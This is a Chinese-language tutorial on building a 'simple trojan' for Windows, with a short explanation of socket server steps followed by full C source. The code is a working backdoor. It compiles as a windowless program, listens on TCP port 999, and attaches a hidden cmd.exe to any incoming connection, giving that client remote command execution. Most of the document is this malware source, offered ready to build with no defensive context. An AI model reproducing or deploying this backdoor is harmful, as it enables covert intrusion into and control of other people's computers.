实现一个简单的木马,一般需要客户端和服务端,为了便于实现,就用Windows自带的Telnet软件远程连接,服务端通过监听某个端口提供服务,类似于Telnet服务的后台程序。其服务端编程的基本原理如下:
1)打开一通信通道(绑定某个端口)并告知本地主机,它在某一个地址上接收客户请求。利用Socket和bind函数实现。
2)等待客户请求到达该端口。利用listen函数实现。
3)接收到重复服务请求,处理该请求并发送应答信号。利用accept函数实现。
4)返回第二步,接收另一客户请求。
5)关闭连接。利用closesock函数实现。
使用到的函数顺序如下:
socket()—>bind()—>listen—>accept()—>closesock()
实现代码如下:
#pragma comment(lib,"ws2_32.lib")
#pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"")
#include <winsock2.h>
#include <windows.h>
#define MasterPort 999 //定义监听端口
int main()
{
WSADATA WSADa;
sockaddr_in SockAddrin;
SOCKET CSocket, SSocket;
int AddrSize;
PROCESS_INFORMATION Processinfo;
STARTUPINFO Startupinfo;
char szCMDPath[255];
//配内存资源,初始化数据
ZeroMemory(&Processinfo, sizeof(PROCESS_INFORMATION));
ZeroMemory(&Startupinfo, sizeof(STARTUPINFO));
ZeroMemory(&WSADa, sizeof(WSADATA));
//获取CMD路径
GetEnvironmentVariable("COMSPEC", szCMDPath, sizeof(szCMDPath));
//加载ws2_32.dll
WSAStartup(0x202,&WSADa);
//设置本地信息和绑定协议,建立socket
SockAddrin.sin_family = AF_INET;
SockAddrin.sin_addr.s_addr = INADDR_ANY;
SockAddrin.sin_port = htons(MasterPort);
CSocket = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);
//设置绑定断端口999
bind(CSocket,(sockaddr*)&SockAddrin, sizeof(SockAddrin));
//设置服务器监听端口
listen(CSocket, 1);
AddrSize = sizeof(SockAddrin);
//开始连接远程服务器,并配置隐藏窗口结构体
SSocket = accept(CSocket, (sockaddr*)&SockAddrin, &AddrSize);
Startupinfo.cb = sizeof(STARTUPINFO);
Startupinfo.wShowWindow = SW_HIDE;
Startupinfo.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
Startupinfo.hStdInput = (HANDLE)SSocket;
Startupinfo.hStdOutput = (HANDLE)SSocket;
Startupinfo.hStdError = (HANDLE)SSocket;
//创建匿名管道
CreateProcess(NULL, szCMDPath, NULL, NULL, TRUE, 0, NULL, NULL, &Startupinfo, &Processinfo);
WaitForSingleObject(Processinfo.hProcess, INFINITE);
CloseHandle(Processinfo.hProcess);
CloseHandle(Processinfo.hThread);
//关闭进程句柄
closesocket(CSocket);
closesocket(SSocket);
WSACleanup();
return 0;
}